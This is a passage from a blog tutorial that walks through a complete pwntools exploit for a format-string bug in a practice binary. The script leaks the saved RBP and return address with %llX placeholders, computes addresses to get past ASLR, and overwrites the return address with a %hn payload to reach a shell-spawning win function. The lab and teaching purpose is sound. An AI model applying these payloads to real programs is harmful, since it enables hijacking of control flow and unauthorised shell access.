		if(strlen(input)<=1) break;
		printf(input);
		memset(input,0,BUFSIZE);
	}
	puts("See you next time! Bye.");

}

Like other Python scripts, our exploit script begins with a shebang line that tells the OS program loader to use a Python interpreter to execute the script. Then, we import the pwnlib, load the victim executable binary, set the exploitation context to a Linux-based x86_64 system, and specify the victim binary to the context.

#!/usr/bin/env python3

from pwn import *

exe = ELF("./poc")

context(arch="amd64",os="linux")
context.binary = exe

The vulnerable function process_input uses fgets to read the user-controlled format string into a 32-byte buffer. To streamline the script development process, we have created a helper function to pad our existing payload string to 31 bytes with A, leaving a byte for the trailing newline character.

# Pad payload with b'A' to satisfy the buffer size
def pad_payload(payload):
    BUFSIZE = 31
    padlen = BUFSIZE - len(payload)
    padding = b'A' * padlen
    return payload + padding

The main part of the exploit script begins with a tube r, which abstracts the target process’s standard IO into methods such as read and recv. The function process from the pwnlib starts the target process from the provided executable and returns a tube to the designated process. Using the tube’s methods, we can proceed to the info leak stage and extract the return address and the saved value of register RBP from the current stack frame.

r = process([exe.path], stdin=PTY)

The return address on the stack, also known as the saved value of the RIP register, is handled by the CPU in x86_64 architecture when executing the call instruction. The CPU pushes the current value of the instruction pointer register (RIP) onto the system stack and then jumps to the designated address specified by the instruction. This is similar to the 5-stage Y86 computational model, where the processor writes to RAM in the memory stage and modifies its registers in the writeback stage. In the Y86 model, the fetch stage loads the current instruction and increments the program counter (similar to the instruction pointer register in x86_64).

Since the fetch stage precedes the memory stage and the writeback stage in an instruction cycle, the return address on the stack always points to the instruction immediately following the call instruction. The control flow is transferred without offsets when the corresponding ret instruction is encountered.

In the stack frame of the process_input function, the saved RBP is 16 bytes away from the stack pointer. Given the first stack parameter of the printf positional parameters is at index six, we can use the format string %8$x to retrieve the value of the saved RBP register. The long-long length modifier ll helps avoid precision-related cutoffs. One can apply a 16-character width modifier and a leading zero modifier for a structured output. By replacing the conversion modifier x with X, we can ensure that the output is in capitalized hexadecimal format. The final version of the placeholder %8$016llX will always produce a 16-character capitalized hexadecimal representation of the value of the saved RBP register.

Similarly, %9$016llX can be used to obtain the return address, given that the saved RBP is 8 bytes long and the return address is adjacent. Thanks to the sufficient space in the format string buffer, we can create a format string with both placeholders and retrieve both values within one format print procedure call.

# Dump on-stack saved RBP and RIP(return address)
r.send(pad_payload(b'%8$016llX%9$016llX'))

The format string will generate a 45-byte ASCII string in the format 00007FFD4E1DF9F000005CE6F938A305AAAAAAAAAAAAA. The first 16 characters represent the leaked RBP value on the stack, and the following 16 represent the leaked RIP value (return address). The remaining characters are padding.

The leaked RBP value is 0x7ffd4e1df9f0, and the leaked return address is 0x5ce6f938a305. With the leaked RBP value, we can determine the current stack frame’s return address’s runtime address. By deducing the offset 0x48 from the leaked integer value, we can identify the destination to overwrite.

# Decode, parse dumped RBP and RIP value
savedRBP_raw = r.recv(16)
savedRBP = int(savedRBP_raw,16)
savedRIP_addr = savedRBP-0x48
savedRIP_raw = r.recv(16)
savedRIP = int(savedRIP_raw,16)

Similarly, we can quickly obtain the relocated address of the executable section through simple arithmetic. The base address for the relocated section can be determined by subtracting the static offset (0x1305) from the leaked return address, as discussed in earlier sections.

Having the runtime base address, we can calculate the runtime win function address by adding the static offset of the win function to the base address.

# Calculate the base address of the mapped ELF sections
exe.address = savedRIP - 0x1305
# Calculate the remapped win function address (ASLR bypass)
win_func_addr = exe.address + 0x11b9

Everything is set, and now it’s time to put together the payload to gain control of the victim program’s control flow. The payload consists of a format string comprising both printable and non-printable bytes. We will start with the runtime address of the win function, 0x5ce6f938a1b9. This address shares a common prefix with the authentic return address, 0x5ce6f938a305. So, we can use the partial overwrite trick with a half-length modifier that only changes the last four digits in the hexadecimal representation. Like other unsigned integers, return addresses are in little-endian format on the stack. The last four digits in the hexadecimal representation correspond to the leading two bytes. Therefore, no adjustments for the target overwrite address are necessary. To perform the overwrite, we simply take the last four digits of the win function’s runtime address, convert it into decimal, and then encode it as a width specifier in a printable placeholder like %41401c.

Even though we know the runtime address of the return address of the current stack frame to overwrite, we must load it somewhere higher than the current stack pointer (RSP). We simply append the little-endian encoded unsigned integer to the end of our format string payload to do this. It’s better to append it to the end instead of inserting it at the beginning, as the little-endian encoded unsigned integer comes with trailing zeros, which are null bytes, typically indicating the termination of a C string. The format print functions stop interpretation when they reach a null byte in the format string.

The n conversion specifier only dereferences addresses aligned to eight. The format string must be padded before appending the little-endian encoded unsigned integer to meet alignment requirements.

We must calculate the length of the format string to determine how much padding is required. The first part of the format string had a placeholder like %41401c, so we know there are at least two characters, % and c, in such placeholders. The width modifier for such placeholders could be significant. However, as we are using the half-length modifier for the placeholder with the n conversion specifier, values of the width modifier beyond the maximum of an unsigned short integer are meaningless. Hence, for the first placeholder, the most extended form could be %65535c, comprised of 7 characters.

Next, we move on to the second placeholder, where the n conversion specifier is located. The placeholder with the n conversion specifier could be relatively short, as there’s no need for a width modifier with five digits. However, a width modifier with more than one digit might be needed, as the input buffer is located at the stack frame of the main function, a little distance from the current stack pointer (RSP). Therefore, we assume two digits for the width modifier associated with the placeholder consisting of the n conversion specifier. We will have something like %xx$hn, where the xx represents two decimal digits for the width modifier. Therefore, the format string will look like %xxxxxc%xx$hn, at most 13 characters long. Given that the input buffer is 32 bytes long, we could assign the first 16 bytes for the format string and the padding, then the subsequent 8 bytes for the little-endian encoded unsigned integer, with the remaining 8 unused. Traditionally, we prefer to use A for padding.

# Encode the address-to-overwrite into little endian bytes
savedRIP_addr_raw = p64(savedRIP_addr)
# Generate format string to overwrite the return address 
win_func_addr_suf = win_func_addr & 0xffff
payload = f"%{win_func_addr_suf}c%12$hn"
payload = payload.encode() + b'A'*(16-len(payload))
payload = payload + savedRIP_addr_raw 

Here comes the most exciting part of our journey. We have assembled the payload and are ready to fire. We’ll send the payload to the victim process, wait, and discard all garbage outputs from printf until it reaches See you next time! Bye. This will indicate that the process_input function is about to return. Then, we’ll turn the script into an interactive console and enjoy the shell the win function provides.

# Deploy the attack payload
r.send(pad_payload(payload)+b'\n')
r.recvuntil(b'See you next time! Bye.')
# enjoy shell :)
r.interactive()

Part two of our Pwn trilogy covered the relocation alongside ASLR, tricks for practicing indirect memory writes using format printing, and a valuable plugin for GDB. We also delved into exploiting a user-controllable format string. In part three, we will revisit a CTF challenge in which the input buffer is limited and cannot directly load the address to overwrite onto the stack.

Attachments

pwn-trilogy-part-ii-poc.py

skid-t@cyberspace:~$

Archive

About

RSS